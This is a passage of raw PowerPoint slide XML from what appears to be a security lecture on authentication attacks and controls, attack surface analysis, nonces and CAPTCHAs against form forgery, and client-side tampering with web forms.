            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>interrupted transaction or disabled connectivity before transaction completed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1159526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4899299-D511-4C5A-A704-D2DA70F6615C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE44E62C-F687-4CB7-844B-09D391912C84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication (Login-Password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access Control (Permissions)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26130186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AA68B-B22F-4823-80D3-F8D000174AD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="663574"/>
            <a:ext cx="8229600" cy="754063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication Misuse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5776900-5EFA-462C-A18A-9B91FE693466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F7CBCC7-885F-4BA7-8A89-A3843F91B212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Stolen login/password combinations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Easily guessed passwords (e.g., default passwords)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Brute force, dictionary attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Knowledge-based answers (considered weak)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Easily broken password files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Broken authentication algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Plaintext passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Login left open on public computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10D012E2-6D88-478D-AFED-53456E45D9AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4B87B67-0B31-4AF8-82D6-E4869FDD9E86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Multifactor authentication counters stolen/guessed authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Passwords stored via strong hash algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Best-practice password checking: complexity, changes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>less effective compared to multifactor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Limited or increasingly delayed failed login attempts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 18" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D081F3D-F0D8-43B7-92A4-E1DE0919BC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0563" y="786733"/>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8" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20498CF0-E467-4FD3-AFD9-AC664A8179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7563" y="783599"/>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8" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56BC9484-D0F7-4A3D-A28E-8DF5FC3020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34563" y="771524"/>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4095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829BB9-6E75-ECC6-F192-A37C44E994D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>A suit of armor protects a knight’s attack surface (by covering nearly his entire body), </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Attack Surface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: What is vulnerable in our software?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Consider where newly arising vulnerabilities may lie that have not already been considered.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Attack surface minimization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>considers how can our program be completely protected</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB87724-E26F-8BD8-9950-F7C888EE1D61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack Surface Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1259294350"/>
      </p:ext>
    </p:extLst>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8A688299-0BCB-4E25-B35D-1C291A4FC8AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Control:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Prevent Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FA0E23E-1885-4211-8368-CDB76AB2E7A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>When no authentication used use a nonce for each form </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>nonce prevents replay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>Nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> = a number or CAPTCHA generated for a specific use, such as session authentication)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45060" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAFF5BBC-8B69-444E-B6B0-554EEA1E2D44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="1752600"/>
            <a:ext cx="4191000" cy="4916488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1D1FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Name:   Ann  Winkler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Address:  2526 Pratt Ave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>	Racine WI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Phone: 262-595-2111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Interests: Horses, Movies, Travel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Security Code: Johnson Rivers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45061" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA21CE4D-B6F2-48F5-81FB-B5AD4B2B29DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="5486400"/>
            <a:ext cx="1447800" cy="53340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SzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Submit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45062" name="Rectangle 6" descr="Bouquet">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CC117DB-4AE5-4248-95E5-7BAA58030532}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4495800"/>
            <a:ext cx="1905000" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect/>
            <a:tile tx="0" ty="0" sx="100000" sy="100000" flip="none" algn="tl"/>
          </a:blip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SzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Security Code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Johnson</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800">
              <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Chiller" panose="04020404031007020602" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Rivers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6143643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D92985B0-715B-474F-BC59-3D391E7CBE79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="621476"/>
            <a:ext cx="8229600" cy="1283524"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Attack:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Removed Local Authorization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7054911A-0CF2-42FF-B5EC-FBE6B0498D18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2133600"/>
            <a:ext cx="3276600" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Web servers can be memoryless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Do not remember sending a form to a client – what type, info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Client side can remove checks, insert other code, return unexpected data, etc. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31748" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6EC3331-F8AB-4865-982F-ADCF4AB3D7C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4517823" y="2819400"/>
            <a:ext cx="3389515" cy="301144"/>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31749" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A59BD240-8D33-4390-98A7-551CEE99FD01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4517823" y="3553577"/>
            <a:ext cx="3389515" cy="41709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31750" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D613309-E61C-4905-94CA-A75D66C214B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-295627">
            <a:off x="5381573" y="2600267"/>
            <a:ext cx="2048371" cy="379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Web access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31751" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0B04F58-CDFE-450E-B82C-9612825FD362}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
